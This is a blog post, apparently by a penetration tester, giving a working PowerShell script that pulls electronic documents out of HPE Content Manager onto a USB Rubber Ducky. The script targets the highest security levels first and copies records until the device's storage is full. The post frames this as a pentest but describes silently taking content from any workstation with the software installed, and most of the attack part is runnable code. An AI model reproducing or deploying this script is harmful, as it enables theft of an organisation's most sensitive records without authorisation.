Exfiltrating Electronic Documents from Content Manager
I'm loving Powershell more and more! The capabilities are outstanding and never-ending. This can be both a blessing and a curse though, as it exposes functionality many administrators would loathe (if only they knew about the risks!).
For instance, I just wrote a script to use as part of a pentest. The ultimate goal of this pentest is to exfiltrate documents via a USB Rubber Ducky. To accomplish that I need a light-weight script tailored to the scenario.
We can break down the script into 5 major pieces of logic:
- Setup the script
- Connect to CM
- Find and process security levels
- Find records for the levels
- Extract the files
With all this in place I'll create a ducky script to be compiled and placed on my rubber ducky. Then I can stick that into any workstation where Content Manager has been installed and then silently extract as much content as I'd like to. Take a look at the script below!
Setup the script
First things first, I need to import the Content Manager namespace. I accomplish that by using Add-Type and pointing to the default installation location. Now that won't work in all environments, but it's sufficient for my pentest.
Second, the USB Rubber Ducky will be inserted into the computer and then assigned a drive letter by Windows. I won't know the drive letter, but I need it! So I use Get-Location to retrieve the drive letter and then tack on an "R" to represents where I want my records to be placed.
Lastly, I fetch the current amount of free space on the MicroSD card I'll insert into the ducky. My current hardware is limited to an 8 GB SD card, but after each exfiltration I'll swap out the card. In case I don't, I don't want errors because I hardcoded the maximum amount to extract. I also prepare a variable to track how much space I've extracted.
Add-Type -Path "C:\Program Files\Hewlett Packard Enterprise\Content Manager\HP.HPTRIM.SDK.dll" $rootDrive = (get-location).Drive.Name $rootPath = "$($rootDrive):\r" $maxVolume = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='$($rootDrive):'" | Foreach-Object {$_.FreeSpace} $curVolume = [long]0
Connect to CM
I don't really need much code for this task, but I'm considering it to be a distinct task in my pentest. That's because I may want to expand upon the logic. I envision dynamically determining the various datasets available on the workstation and then repeating the extraction for each dataset (or possibly doing some reconnaissance and then inserting server names or dataset IDs).
$db = New-Object HP.HPTRIM.SDK.Database
Find and process security levels
There's not really much of a reason to exfiltrate public electronic records, right? So I want to ensure that I'm focusing on the secured stuff first. To do that I need to search for all the available levels and then process them in reverse order.
$levels = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, SecurityLevel $levels.SearchString = "all" $levels.SetSortString("levelNumber-") foreach ( $level in $levels ) { #insert record logic here if ( [long]$curVolume -ge [long]$maxVolume ) { break; } }
Find and process records
At this point in the script I've got everything I need to search for records, so I just need to craft the search string and execute it. Then I can process each record!
$recs = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, Record $searchString = "securityLevel:$($level.LevelNumber) electronic" $recs.SearchString = $searchString $recs.SetSortString('createdOn-') foreach ( $result in $recs ) { $rec = [HP.HPTRIM.SDK.Record]$result [long]$curVolume += [long]$rec.DocumentSize if ( [long]$curVolume -lt [long]$maxVolume ) { $sp = Join-Path $rootPath $rec.SuggestedFileName $rec.GetDocument($sp) } else { break; } }